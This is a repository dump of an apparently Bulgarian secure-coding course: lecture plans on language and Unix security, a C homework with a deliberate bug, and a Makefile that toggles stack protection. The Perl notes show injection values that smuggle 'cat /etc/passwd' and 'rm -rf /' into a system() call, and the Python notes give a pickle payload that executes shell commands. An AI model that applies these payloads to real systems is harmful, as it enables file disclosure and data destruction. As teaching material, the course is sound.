46 | 	search for RESTRICTED SHELL
47 | 
48 | Shellshock attack - https://blog.cloudflare.com/inside-shellshock/
49 | Patches for the attack - http://thread.gmane.org/gmane.comp.shells.bash.bugs/22190
50 | 
51 | 


--------------------------------------------------------------------------------
/code/C/today.txt:
--------------------------------------------------------------------------------
 1 | 1. kernel protections, като показвам какво правят в няколко картинки :)
 2 | - ASLR (Kernel space, User space, MMAP)
 3 | - NX bit ( loader protection)
 4 | - mprotect (mmap, protection)
 5 |        PROT_NONE  The memory cannot be accessed at all
 6 |        PROT_READ  The memory can be read
 7 |        PROT_WRITE The memory can be modified
 8 |        PROT_EXEC  The memory can be executed
 9 | 2. една примерна програмка с gets :)
10 | 3. показвам buffer overflow-a
11 | 4. компилирам със stack protector
12 | 5. Обяснявам различните stack protector механизми
13 | 6. показвам го в малко код
14 | 
15 | http://upx.sourceforge.net/
16 | 
17 | http://www.hackitoergosum.org/2010/HES2010-prascagneres-Stack-Smashing-Protector-in-FreeBSD.pdf
18 | http://wiki.osdev.org/Stack_Smashing_Protector
19 | A Comparison of Buffer Overflow Prevention Implementations and Weaknesses  - https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-silberman/bh-us-04-silberman-paper.pdf
20 | Mprotect - https://pax.grsecurity.net/docs/segmexec.txt
21 | 
22 | Fortify source: https://idea.popcount.org/2013-08-15-fortify_source/
23 | Stack protector: https://lwn.net/Articles/584225/
24 | 
25 | 
26 | EBP - Frame pointer
27 | EIP - Instruction pointer
28 | ESP - Stack pointer
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------
/lecture-plans/intro.txt:
--------------------------------------------------------------------------------
 1 | - Intro
 2 | - Programming languages
 3 |   - compiled
 4 |   - interpretative
 5 |   - just-in-time compilation
 6 | - Types of attacks
 7 |   - overflow
 8 | 	- stack
 9 | 	- heap
10 | 	- integer
11 | 	- memory allocation 
12 | 	- underflow
13 | 	- off by one
14 |   - injection
15 | 	- format string
16 | 	- path
17 | 	- shell
18 | 	- sql
19 | 	- code
20 | 	- XSS
21 | 	- CSRF
22 | 	- Unicode
23 |   - logical
24 | 	- DNS
25 | 	- Timing (password brute-forcing)
26 | 	- Crypto
27 | - Denial of servic
28 | - Input validation
29 | 
30 | - Intro
31 |   - Why we decided to make this course
32 |   - Present all speakers
33 |     - Vasil
34 |     - Petko
35 |     - Joan
36 |     - Bobi
37 |     - Marian
38 |   - Adminitrative things 
39 |     - Site
40 |     - Mailing list
41 |     - Recordings
42 |     - Exam
43 |     - Course work
44 | 
45 | - Programming languages
46 |   - What is machine code?
47 |   - What is a compiled language?
48 |   - What is a interpretative language?
49 |     - Why are they slower... simply because "if ($a == 0)" can be translated to:
50 |     1. get the addres of an elemet of this($a) data structure
51 |     2. convert this element to integer(because most probably it is not and int)
52 |     3. convert 0 to integer
53 |     4. add the converted variables as parameters to the cmopare() function
54 |     5. the compare() function executes the cmp CPU instruction
55 |   - What is just-in-time compilation?
56 | 
57 | Go trough the course schedule
58 | - Tupes of attacks
59 |   - memory
60 | 	- stack vs. heap
61 | 	- overflows
62 | 		- integer - car km meter overflow. 
63 | 		- stack
64 | 		- heap
65 | 
66 | 
67 | Useful links:
68 | 	Wikipedia(for each subject that was discussed)
69 | 	http://gribblelab.org/CBootcamp/7_Memory_Stack_vs_Heap.html
70 | 
71 | 


--------------------------------------------------------------------------------
/code/C/Makefile:
--------------------------------------------------------------------------------
 1 | TARGETS = no-protection stack-protection fortify-1 fortify-2 format-string
 2 | STACK_SOURCE = stack-protection.c
 3 | FORMAT_SOURCE = format-string.c
 4 | 
 5 | all: $(TARGETS)
 6 | 
 7 | no-protection: $(STACK_SOURCE)
 8 | 	gcc -g -Wall -Wpragmas -fno-stack-protector $(STACK_SOURCE) -o no-protection
 9 | 
10 | # -fstack-protector
11 | #     Emit extra code to check for buffer overflows, such as stack smashing attacks.  This is done by adding a guard variable to functions with vulnerable objects.  This includes
12 | #     functions that call "alloca", and functions with buffers larger than 8 bytes.  The guards are initialized when a function is entered and then checked when the function exits.  If a
13 | #     guard check fails, an error message is printed and the program exits.
14 | #
15 | # -fstack-protector-all
16 | #     Like -fstack-protector except that all functions are protected.
17 | #
18 | # -fstack-protector-strong
19 | #     Like -fstack-protector but includes additional functions to be protected --- those that have local array definitions, or have references to local frame addresses.
20 | #
21 | # -fstack-protector-explicit
22 | #     Like -fstack-protector but only protects those functions which have the "stack_protect" attribute
23 | 
24 | stack-protection: $(STACK_SOURCE)
25 | 	gcc -g -Wall -Wpragmas -fstack-protector $(STACK_SOURCE) -o stack-protection
26 | 
27 | fortify-1: $(STACK_SOURCE)
28 | 	gcc -g -Wall -Wpragmas -D_FORTIFY_SOURCE=1 -O1 $(STACK_SOURCE) -o fortify-1
29 | 
30 | fortify-2: $(STACK_SOURCE)
31 | 	gcc -g -Wall -Wpragmas -D_FORTIFY_SOURCE=2 -O2 $(STACK_SOURCE) -o fortify-2
32 | 
33 | format-string: $(FORMAT_SOURCE)
34 | 	gcc -g -Wall -Wpragmas -D_FORTIFY_SOURCE=2 -O2 $(FORMAT_SOURCE) -o format-string
35 | 
36 | 
37 | clean:
38 | 	rm -f $(TARGETS)
39 | 


--------------------------------------------------------------------------------
/lecture-plans/java-security.txt:
--------------------------------------------------------------------------------
 1 |   - SQL
 2 |   - Shell
 3 |   - Code
 4 |   - Hash implementation(collisions)
 5 |   - general language issues
 6 | 
 7 | JVM
 8 |  - can run Java, Scala, Haskell(Eta)
 9 |  - has its own security module java.security.manager
10 |   https://docs.oracle.com/javase/7/docs/technotes/guides/security/PolicyFiles.html
11 | 	java -Djava.security.managerMyApplication
12 | 	java -Djava.security.manager=default MyApplication
13 | 
14 | 	java.lang.SecurityManager class
15 | 	java.lang.System.getSecurityManager()
16 | 	java.lang.System.setSecurityManager()
17 | 
18 |  * AllPermission(): Permission to all resources.
19 |  * FilePermission(String fileName, String access): Permissions for file access. Access string can contain "read," "write," "delete," and "execute" separated by commas.
20 | 	java.security.AccessController.checkPermission(permission);
21 |  * SocketPermission(String address,String access): Permissions for network socket connections. Address string can be in URL or IP form; access string can contain "accept" and "connect" operations.
22 |  * PropertyPermission(String prop,String access): Permissions for property settings.
23 |   https://docs.oracle.com/javase/6/docs/technotes/guides/security/spec/security-specTOC.fm.html
24 |   
25 | Java can run scripting languages
26 |  - ScriptEngineManager
27 | 	https://docs.oracle.com/javase/7/docs/api/javax/script/ScriptEngineManager.html
28 |  - JavaScript
29 |     https://www.owasp.org/index.php/Code_injection_in_Java
30 |  - LUA
31 | 
32 | Application servers
33 |  - TomCat
34 |   - JSP :(
35 |  - JBoss
36 | 
37 | Applets... hope you never work with these :)
38 | 
39 | SEI CERT Coding Standard for Java
40 |   https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java
41 | 
42 | Android Secure Coding Standard
43 |   https://wiki.sei.cmu.edu/confluence/display/android/Android+Secure+Coding+Standard
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/beamercolorthemekrok.sty:
--------------------------------------------------------------------------------
 1 | % Copyright 2007 by Till Tantau
 2 | %
 3 | % This file may be distributed and/or modified
 4 | %
 5 | % 1. under the LaTeX Project Public License and/or
 6 | % 2. under the GNU Public License.
 7 | %
 8 | % See the file doc/licenses/LICENSE for more details.
 9 | 
10 | \ProvidesPackageRCS $Header: /home/vedranm/bitbucket/beamer/base/themes/color/beamercolorthemekrok.sty,v d02a7cf4d8ae 2010/06/17 09:11:41 rivanvx $
11 | 
12 | 
13 | \mode<presentation>
14 | 
15 | \definecolor{craneorange}{HTML}{008803}
16 | \definecolor{craneblue}{HTML}{000000}
17 | 
18 | 
19 | \setbeamercolor{structure}{fg=craneblue}
20 | 
21 | \setbeamercolor{palette primary}{fg=craneblue,bg=craneorange!70}
22 | \setbeamercolor{palette secondary}{fg=craneblue,bg=craneorange!80}
23 | \setbeamercolor{palette tertiary}{fg=craneblue,bg=craneorange!90}
24 | \setbeamercolor{palette quaternary}{fg=craneblue,bg=craneorange}
25 | 
26 | \setbeamercolor{titlelike}{parent=palette quaternary}
27 | 
28 | \setbeamercolor{block title}{fg=craneblue,bg=craneorange}
29 | \setbeamercolor{block title alerted}{use=alerted text,fg=craneblue,bg=alerted text.fg!75!bg}
30 | \setbeamercolor{block title example}{use=example text,fg=craneblue,bg=example text.fg!75!bg}
31 | 
32 | \setbeamercolor{block body}{parent=normal text,use=block title,bg=block title.bg!25!bg}
33 | \setbeamercolor{block body alerted}{parent=normal text,use=block title alerted,bg=block title alerted.bg!25!bg}
34 | \setbeamercolor{block body example}{parent=normal text,use=block title example,bg=block title example.bg!25!bg}
35 | 
36 | \setbeamercolor{sidebar}{bg=craneorange!70}
37 |   
38 | \setbeamercolor{palette sidebar primary}{fg=craneblue}
39 | \setbeamercolor{palette sidebar secondary}{fg=craneblue!75}
40 | \setbeamercolor{palette sidebar tertiary}{fg=craneblue!75}
41 | \setbeamercolor{palette sidebar quaternary}{fg=craneblue}
42 | 
43 | \setbeamercolor*{separation line}{}
44 | \setbeamercolor*{fine separation line}{}
45 | 
46 | \mode
47 | <all>
48 | 


--------------------------------------------------------------------------------
/presentations/python/Python_files/css.css:
--------------------------------------------------------------------------------
 1 | @font-face {
 2 |   font-family: 'Droid Sans Mono';
 3 |   font-style: normal;
 4 |   font-weight: 400;
 5 |   src: local('Droid Sans Mono'), local('DroidSansMono'), url(http://fonts.gstatic.com/s/droidsansmono/v7/ns-m2xQYezAtqh7ai59hJYdJ2JT0J65PSe7wdxAnx_I.woff2) format('woff2'), url(http://fonts.gstatic.com/s/droidsansmono/v7/ns-m2xQYezAtqh7ai59hJUYuTAAIFFn5GTWtryCmBQ4.woff) format('woff');
 6 | }
 7 | @font-face {
 8 |   font-family: 'Open Sans';
 9 |   font-style: normal;
10 |   font-weight: 400;
11 |   src: local('Open Sans'), local('OpenSans'), url(http://fonts.gstatic.com/s/opensans/v10/cJZKeOuBrn4kERxqtaUH3VtXRa8TVwTICgirnJhmVJw.woff2) format('woff2'), url(http://fonts.gstatic.com/s/opensans/v10/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff) format('woff');
12 | }
13 | @font-face {
14 |   font-family: 'Open Sans';
15 |   font-style: normal;
16 |   font-weight: 600;
17 |   src: local('Open Sans Semibold'), local('OpenSans-Semibold'), url(http://fonts.gstatic.com/s/opensans/v10/MTP_ySUJH_bn48VBG8sNSugdm0LZdjqr5-oayXSOefg.woff2) format('woff2'), url(http://fonts.gstatic.com/s/opensans/v10/MTP_ySUJH_bn48VBG8sNSnhCUOGz7vYGh680lGh-uXM.woff) format('woff');
18 | }
19 | @font-face {
20 |   font-family: 'Open Sans';
21 |   font-style: italic;
22 |   font-weight: 400;
23 |   src: local('Open Sans Italic'), local('OpenSans-Italic'), url(http://fonts.gstatic.com/s/opensans/v10/xjAJXh38I15wypJXxuGMBo4P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'), url(http://fonts.gstatic.com/s/opensans/v10/xjAJXh38I15wypJXxuGMBobN6UDyHWBl620a-IRfuBk.woff) format('woff');
24 | }
25 | @font-face {
26 |   font-family: 'Open Sans';
27 |   font-style: italic;
28 |   font-weight: 600;
29 |   src: local('Open Sans Semibold Italic'), local('OpenSans-SemiboldItalic'), url(http://fonts.gstatic.com/s/opensans/v10/PRmiXeptR36kaC0GEAetxl2umOyRU7PgRiv8DXcgJjk.woff2) format('woff2'), url(http://fonts.gstatic.com/s/opensans/v10/PRmiXeptR36kaC0GEAetxn5HxGBcBvicCpTp6spHfNo.woff) format('woff');
30 | }
31 | 


--------------------------------------------------------------------------------
/lecture-plans/perl-security.txt:
--------------------------------------------------------------------------------
 1 |   - SQL
 2 |   - Shell
 3 |   - Code
 4 |   - Hash implementation(collisions)
 5 |   - general language issues
 6 | 
 7 | Environment:
 8 | 	INC
 9 | 	PERLLIB
10 | 	PERL5LIB
11 | 	-I (cmd line argument to add more dirs to @INC
12 | 
13 | 
14 | Execution: 
15 | 	perl interpreter -> script file
16 | 
17 | 
18 | exec() vs `` vs  system() vs qx//
19 | 
20 | 	$username = param ("username");
21 | 	system("cat /home/pesho/$username");
22 | 
23 | 	What if username='; cat /etc/passwd' ?
24 | 
25 | 	system("cat /home/pesho/; cat /etc/passwd");
26 | 
27 | 	And what if username='; rm -rf /' ?
28 | 	system("cat /home/pesho/; rm -rf /");
29 | 
30 | 	
31 | 	system("cat", "/home/pesho/$username");
32 | 
33 | Error code handling:
34 | 	http://perldoc.perl.org/perlvar.html#Error-Variables
35 | 
36 | 
37 | Race conditions
38 |   unless (-e "/tmp/a_temporary_file") {
39 |        open (FH, ">/tmp/a_temporary_file");
40 |   }
41 | 
42 | Open files:
43 | 	Insecure:
44 | 	open(my $fd, "<$user_data");
45 | 
46 | 	A lot more secure :)
47 | 	open(my $fd, ">", "$user_data");
48 | 
49 | 	File open modes:
50 | 	>	- writing
51 | 	>>	- overwriting (truncate the file and place the cursor at the begining)
52 | 	<	- reading
53 | 	+<	- read and write
54 | 	>+	- read and write
55 | 	-|	- start a command and read everything FROM its output
56 | 	|-	- start a command and send everything TO its input
57 | 
58 | 	Special case:
59 | 		open(my $tmp, "+>", undef)
60 | 	opens a temporary filename
61 | 
62 | Tainted Mode
63 | 	-t tainting warnings
64 | 	-T tainting checks(warnings + generate error)
65 | 
66 | Regular Expressions issues:
67 | 	http://perldoc.perl.org/perlretut.html#A-bit-of-magic:-executing-Perl-code-in-a-regular-expression
68 | 
69 | 
70 | Useful links:
71 |   http://perldoc.perl.org/perlsec.html - Perl Security
72 |   http://www.cgisecurity.com/lib/sips.html - Security Issues in Perl Scripts
73 |   http://phrack.org/issues/55/7.html - Perl CGI problems
74 |   https://www.cvedetails.com/vendor/1885/Perl.html
75 |   
76 | 


--------------------------------------------------------------------------------
/lecture-plans/ruby-security.txt:
--------------------------------------------------------------------------------
 1 |   - SQL
 2 |   - Shell
 3 |   - Code
 4 |   - Hash implementation(collisions)
 5 |   - general language issues
 6 |  http://storage.btroyan.info/petko/ruby/#/21
 7 | 
 8 | Interpreters
 9 |  - Matz's Ruby Interpreter (MRI) / CRuby
10 |  - JRuby
11 |  - Rubinius
12 |  - mruby - used for IoT
13 |  - Opal - turns Ruby into JavaScript
14 |  - RubyMotion -  Ruby implementation (written using Objective-C and Cocoa)
15 | 
16 | gem/bundle
17 |  - gem insecurity - http://guides.rubygems.org/security/
18 | 
19 | Important style differences
20 |  - everything starting with capital letter is a constant (vars, classes)
21 |  - every variable starting with $ is a global variable... however there are thread global variables like $? and similar
22 | 
23 | Since everything is na object and is mutable... The following code will break your apps :)
24 |  String = 42 
25 | 
26 | 
27 | The most influential frameworks
28 |  - Ruby on Rails
29 |  - Sinatra
30 | 
31 | https://github.com/ankane/secure_rails
32 | 
33 | Database of vulnerable gems:
34 | 	https://github.com/rubysec/ruby-advisory-db
35 | 
36 | Mass assignment:
37 | 	https://en.wikipedia.org/wiki/Mass_assignment_vulnerability
38 | 	https://code.tutsplus.com/tutorials/mass-assignment-rails-and-you--net-31695
39 | 	Mass assignment saves you much work.
40 | --
41 | 	def signup
42 | 	  @user = User.create(params[:user])
43 | 	end
44 | --
45 | 	params[:user] #=> {:name => "ow3ned", :admin => true}
46 | --
47 | 
48 | 	Protection:
49 | 		attr_accessible :name
50 | 
51 | 
52 | Ruby $SAFE
53 | 	http://ruby-doc.com/docs/ProgrammingRuby/html/taint.html
54 | 	https://bugs.ruby-lang.org/issues/8468
55 | 
56 | Ruby Style Guide - https://github.com/bbatsov/ruby-style-guide
57 | 
58 | RoR Security 
59 |   - https://guides.rubyonrails.org/security.html
60 |   - https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet
61 |   - Rails SQL injections https://rails-sqli.org/
62 | 
63 | Ruby basic security info - https://ruby-doc.org/core-2.5.0/doc/security_rdoc.html
64 | 
65 | Regexp only till \n 
66 | 
67 | 


--------------------------------------------------------------------------------
/lecture-plans/js-security.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | NaN vs. undefined vs. null vs. false
 3 | 
 4 | JavaScript Equality :)
 5 |  - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness
 6 |  - https://dorey.github.io/JavaScript-Equality-Table/
 7 | 
 8 | JavaScript Strict mode
 9 |  - available since ECMAScript5
10 |  - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Strict_mode
11 | 
12 | Memory Management
13 |  - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Memory_Management
14 | 
15 | Closuers
16 |  - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Closures
17 | 
18 | 
19 | WebSockets security
20 |  - https://resources.infosecinstitute.com/websocket-security-issues/
21 |  
22 | 
23 | Client-side storage
24 |  - LocalStorage vs. IndexedDB vs. Web SQL
25 |    LocalStorage can store strings
26 |    IndexedDB can store any type of JS object
27 |    Web SQL allows SQL to be used directly on the client side, by JavaScript
28 |  - https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Client-side_web_APIs/Client-side_storage
29 |  - Storage is shared per-domain, wich means that two applications on the same domain can see each other's client-side data
30 |   https://www.w3.org/TR/webdatabase/#cross-directory-attacks 
31 |  - local storage is not encrypted, access to the storage file can reveal potentially dangerous data
32 | 
33 | JavaScript preventDefault()
34 |  - https://www.w3schools.com/jsref/event_preventdefault.asp
35 |  - https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault
36 |  - https://developer.mozilla.org/en-US/docs/Web/API/Event/cancelable
37 | 
38 | https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet
39 | 
40 | What not to do:
41 |  - Do not try to put password protection inside JavaScript
42 |  - Do not try to put business logic ONLY on the client side
43 |  - Do not make input validation ONLY on the client side
44 | 
45 | Dangerous JavaScript
46 |  - Code: eval(), Function(), setTimeout(), setInterval() and so on.
47 |  - URL based: location.assign()
48 |  - HTML based: document.write(), innerHtml vs. innerText
49 |  - XHR calls: postMessage, BroadcastChannel client-side storage and other JavaScript variables
50 |    https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API
51 | 
52 | 


--------------------------------------------------------------------------------
/homeworks/01/cfg.c:
--------------------------------------------------------------------------------
 1 | #include <sys/types.h>
 2 | #include <sys/stat.h>
 3 | #include <fcntl.h>
 4 | #include <unistd.h> // for lseek
 5 | #include <stdlib.h> // for malloc
 6 | #include <string.h> // for memset
 7 | #include <stdio.h>  // for printf
 8 | 
 9 | #define LINE_SIZE 120
10 | //#define DEBUG
11 | #define FIX
12 | 
13 | void split_line(char *line) {
14 | 	char *key = NULL;
15 | 	char *value = NULL;
16 | 	value = strchr(line, '=');
17 | 	key = strndup(line, value - line);
18 | #ifdef FIX
19 | 	if (value) {
20 | #endif
21 | 		value++;
22 | 		printf("Key: %s Value: %s\n", key, value);
23 | #ifdef FIX
24 | 	}
25 | #endif
26 | }
27 | 
28 | int load_config(const char *file, char *result) {
29 | 	unsigned int fd = -1;
30 | 	char *buf = NULL;
31 | 	char *buf2 = NULL;
32 | 	char *newline = NULL;
33 | 	int ret = -1;
34 | 	int line = 0;
35 | 	int pos = 0;
36 | 	int finished = 0;
37 | 	fd = open(file, O_RDONLY|O_CLOEXEC);
38 | 	if (fd == -1) {
39 | 		return 0;	
40 | 	} else {
41 | 		buf = malloc(LINE_SIZE);
42 | 		buf2 = malloc(LINE_SIZE);
43 | 		while (finished == 0) {
44 | 			memset(buf, '\0', LINE_SIZE);
45 | 			ret = read(fd, buf, LINE_SIZE);
46 | 			if (ret == 0 ) {
47 | 				close(fd);
48 | 				return 0;
49 | 			}
50 | 			if (ret == EOF) {
51 | 				break;
52 | 			}
53 | 			newline = strchr(buf, '\n');
54 | 			while (newline != NULL) {
55 | 				line = newline - buf;			// count the chars until "\n"
56 | 				memset(buf2, '\0', LINE_SIZE);	// clean buf2 from previous input
57 | 				strncat(buf2, buf, line);
58 | #ifdef DEBUG
59 | 				fprintf(stderr, "%-100s\tline: %d read: %d len: %3d %p\n", buf2, line, ret, strlen(buf2), newline);
60 | #endif
61 | 				split_line(buf2);
62 | 				pos += line+1;					// move the total file position forward
63 | 				buf += line+1;					// move the buf forward
64 | 				newline = strchr(buf, '\n');	// find the next "\n"
65 | 			}
66 | #ifdef DEBUG
67 | 			printf("File pos: %d\n", pos);
68 | #endif
69 | 			lseek(fd, pos, SEEK_SET);		// go to the new position, which is the last detected "\n"
70 | 			if (ret < LINE_SIZE || ret == EOF) {
71 | 				finished++;
72 | 				break;
73 | 			}
74 | 		}
75 | 		close(fd);
76 | 		return 1;
77 | 	}
78 | 	return 2;
79 | }
80 | 
81 | int main(void) {
82 | 	char *secrets = NULL;
83 | 
84 | 	load_config("secrets.conf", secrets);
85 | 
86 | 	return 0;
87 | }
88 | 


--------------------------------------------------------------------------------
/lecture-plans/types-of-attacks.txt:
--------------------------------------------------------------------------------
 1 | - Stack overflow
 2 | - Shellcode
 3 |   - arch (ARM, i386, x86-64)
 4 |   - NOP, JMP
 5 | - Heap overflow
 6 | - Memory allocator 
 7 |   - how to use double free 
 8 |   - use after free
 9 |   - overwrite memory allocator structure
10 | - Stack canarry 
11 | - ASLR
12 | - NX
13 | - Return oriented programming
14 | - Integer overflows
15 |   - type conversion
16 |   - sign extension
17 | - Uninitialized data
18 | 
19 | 
20 | Useful links:
21 |   http://www.win.tue.nl/~aeb/linux/hh
22 |   http://www.phrack.org/issues/49/14.html#article
23 |   http://en.wikipedia.org/wiki/NX_bit
24 |   Integer overflow:
25 |     http://web.archive.org/web/20121010025025/http://www.cs.cmu.edu/~dbrumley/pubs/integer-ndss-07.pdf RICH
26 |     https://www.owasp.org/index.php?title=Integer_overflow&setlang=en
27 |     http://www.fefe.de/intof.html Integer overflows
28 |   Heap Overflow:
29 |     http://www.sans.edu/student-files/presentations/heap_overflows_notes.pdf
30 |     http://www.mathyvanhoef.com/2013/02/understanding-heap-exploiting-heap.html
31 |   Buffer Overflow:
32 |     http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-silberman/bh-us-04-silberman-paper.pdf
33 |     http://www.cs.berkeley.edu/~daw/teaching/cs261-f07/reading/beyondsmashing.pdf
34 |     http://www.hpenterprisesecurity.com/vulncat/en/vulncat/cpp/buffer_overflow_off_by_one.html
35 |   Off-by-one:
36 |     http://www.exploit-db.com/wp-content/themes/exploit/docs/28478.pdf
37 |   Format string:
38 |     https://www.owasp.org/index.php/Format_string_attack
39 |     http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
40 | 
41 | Papers:
42 |   FormatGuard 2001 - http://www.nxnw.org/~steve/papers/formatguard-sec01.pdf
43 |   HeapShield 2006  - http://people.cs.umass.edu/~emery/pubs/06-28.pdf
44 |   HeapSentry 2013  - https://securitee.org/files/heapsentry_dimva2013.pdf
45 |   Allocators
46 |     Younan malloc  - http://www.fort-knox.org/files/younan_malloc.pdf
47 |     FreeGuard      - https://www.utdallas.edu/~zhiqiang.lin/file/CCS17c.pdf 
48 |     jemalloc       - http://jemalloc.net/ https://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf
49 |     http://phrack.org/issues/66/15.html Linux Kernel Heap Tampering Detection
50 |   Return oriented programming 
51 |     - https://cseweb.ucsd.edu/~hovav/dist/rop.pdf
52 |     - https://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf
53 | 
54 | Libraries:
55 |   SafeStr - https://www.safaribooksonline.com/library/view/secure-programming-cookbook/0596003943/ch03s04.html
56 | 


--------------------------------------------------------------------------------
/lecture-plans/unix-security.txt:
--------------------------------------------------------------------------------
  1 | - Kernel level exploits
  2 | - Linker issues
  3 | - Dropping privileges (setuid, initgroups, setresuid...)
  4 | - Working with capabilities
  5 | - Namespaces & chroot
  6 | - Filesystem ACLs
  7 | 
  8 | 
  9 | 
 10 | Kernel exploitation
 11 | - Different subsystems
 12 | - Visibility issues
 13 | - Arbitrary code execution kcore, kallsyms
 14 | - loadable modules (CAP_SYS_MODULE)
 15 | 
 16 | Linker issues
 17 | - ld.so
 18 | - ld.so.conf
 19 | - the $ORIGIN
 20 | 	readelf -a
 21 | - LD_PRELOAD
 22 | - LD_LIBRARY_PATH
 23 | - LD_DEBUG slwodown
 24 | - LD_AUDIT CVE-2010-3847
 25 | 
 26 | 
 27 | Dropping privileges
 28 | - What is RUID/EUID/SUID
 29 | - What is setuid binary
 30 | - initgroups	- /etc/group
 31 | - setgroups		- list of groups
 32 | - setuid/gid	- Set effective but clean saved
 33 | - seteuid/gid   - Effective
 34 | - setreuid/gid  - Real + Effective
 35 | - setresuid/gid	- Real + Effective + Saved
 36 | 
 37 | Capabilities
 38 | - What the hell is it?
 39 |      P'(permitted) = (P(inheritable) & F(inheritable)) |
 40 |                      (F(permitted) & cap_bset)
 41 | 
 42 |      P'(effective) = F(effective) ? P'(permitted) : 0
 43 | 
 44 |      P'(inheritable) = P(inheritable)    [i.e., unchanged]
 45 | 
 46 |      P         denotes the value of a thread capability set before the execve(2)
 47 |      P'        denotes the value of a capability set after the execve(2)
 48 |      F         denotes a file capability set
 49 |      cap_bset  is the value of the capability bounding set 
 50 | - File capabilities
 51 | 
 52 | 
 53 | Filesystem ACLs
 54 | - How to do a file read check 
 55 | 	- access()		- RUID
 56 | 	- faccessat()	- 
 57 | 	- euidaccess()	- EUID
 58 | - How to do a permissions check... 
 59 | 	- stat() 
 60 | 	- acl_get_file()/acl_get_fd()
 61 | 		-> acl_get_entry() -> acl_get_permset() -> acl_get_perm()
 62 | - Differences between stat() and lstat()
 63 | - UMASK
 64 | 
 65 | Chrooting
 66 | - chroot + chdir
 67 | 
 68 | Namespaces
 69 | - User
 70 | - PID
 71 | - IPC
 72 | - Mount
 73 | - UTC
 74 | - clone
 75 | - unshare
 76 | - setns
 77 | 
 78 | Inheritance
 79 | - Process execution
 80 | - UID/GID/groups
 81 | - Opened files
 82 | - Limits
 83 | - Capabilities
 84 | - Root directory
 85 | - Namespace
 86 | 
 87 | 
 88 | Links:
 89 |  Linker issues: https://www.nth-dimension.org.uk/pub/BTL.pdf
 90 |  Linker attack: http://seclists.org/fulldisclosure/2010/Oct/257
 91 |  Cheating the ELF: https://grugq.github.io/docs/subversiveld.pdf
 92 |  Kernel exploitation: http://www.win.tue.nl/~aeb/linux/hh/hh-12.html
 93 |  https://www.kernel.org/doc/Documentation/security/credentials.txt
 94 |  https://www.kernel.org/pub/linux/libs/security/linux-privs/kernel-2.2/capfaq-0.2.txt
 95 |  http://linux.die.net/man/7/capabilities
 96 |  https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Storage_Administration_Guide/ch-acls.html
 97 |  https://wiki.archlinux.org/index.php/Access_Control_Lists
 98 | 
 99 |  
100 | 


--------------------------------------------------------------------------------
/lecture-plans/python-security.txt:
--------------------------------------------------------------------------------
 1 |   - SQL
 2 |   - Shell
 3 |   - Code
 4 |   - Hash implementation(collisions)
 5 |   - general language issues
 6 | 
 7 | Python implementations
 8 |  - Python
 9 |  - Cython
10 |  - Jython
11 |  - PyPy
12 | 
13 | Python Virtual Environment - http://docs.python-guide.org/en/latest/dev/virtualenvs/
14 | 
15 | PIP - https://pip.pypa.io/en/stable/
16 | 
17 | Everything in Python is an Object... or it should have been :)
18 |  - types of objects are not backward compatible
19 |    bytes() in 2.x and in 3.x
20 |  - since everything is an object, comparrison between objects is a problem. Given that we have x of type int and y of type float, the next code should not work:
21 |    if x > y:
22 | 
23 | A TON of people will tell you that PEP 8 is a Secure codding guideline.
24 | NO, IT ISN'T!
25 | It is a comperhansive style guide!
26 | 
27 | String literals - https://docs.python.org/2/reference/lexical_analysis.html#string-literals
28 |  - take note to the prefixes of 'r' and 'R'
29 |  - A prefix of 'u' or 'U' makes the string a Unicode string
30 |  - r or R may be combined with u or U prefixes
31 | 
32 | Now let's take a look at two major parts from the language:
33 |  - C modules security
34 |  - Python native issues
35 |     dangerous modules: json, yaml, marshal, pickle, cPickle
36 | 	picle code eval:  "S''*__import__('os').system('echo 0wn3d')\np0\n."
37 | 
38 | Guidelines from OpenStack:
39 |  - https://security.openstack.org/guidelines/dg_apply-restrictive-file-permissions.html
40 |  - https://security.openstack.org/guidelines/dg_avoid-dangerous-input-parsing-libraries.html
41 |  - https://security.openstack.org/guidelines/dg_avoid-shell-true.html
42 |  - https://security.openstack.org/guidelines/dg_use-subprocess-securely.html
43 |  - https://security.openstack.org/guidelines/dg_using-file-paths.html
44 |  - https://security.openstack.org/guidelines/dg_using-temporary-files-securely.html
45 |  - https://security.openstack.org/guidelines/dg_protect-sensitive-data-in-files.html
46 |  - https://security.openstack.org/guidelines/dg_strong-crypto.html
47 |  - https://security.openstack.org/guidelines/dg_cross-site-request-forgery-csrf.html
48 |  - https://security.openstack.org/guidelines/dg_cross-site-scripting-xss.html
49 |  - https://security.openstack.org/guidelines/dg_move-data-securely.html & https://security.openstack.org/guidelines/dg_validate-certificates.html
50 |  - How NOT to do it: https://security.openstack.org/guidelines/dg_use-oslo-rootwrap-securely.html
51 | 
52 | Links:
53 |   http://www.pythonsecurity.org/
54 |   https://www.python.org/dev/peps/ - Index of Python Enhancement Proposals (PEPs)
55 |   https://www.python.org/dev/peps/pep-0008/ - Style Guide for Python Code
56 |   https://www.python.org/news/security/ - How to report security vulnerabilities to Python
57 |   https://www.cvedetails.com/product/18230/Python-Python.html?vendor_id=10210
58 | 
59 | Useful tools:
60 |   https://pypi.python.org/pypi/autopep8
61 |   https://www.pylint.org/
62 |   https://wiki.openstack.org/wiki/Security/Projects/Bandit - Static code analisys
63 |   https://github.com/openstack/syntribos - Automated API security testing
64 | 


--------------------------------------------------------------------------------
/course-plan.txt:
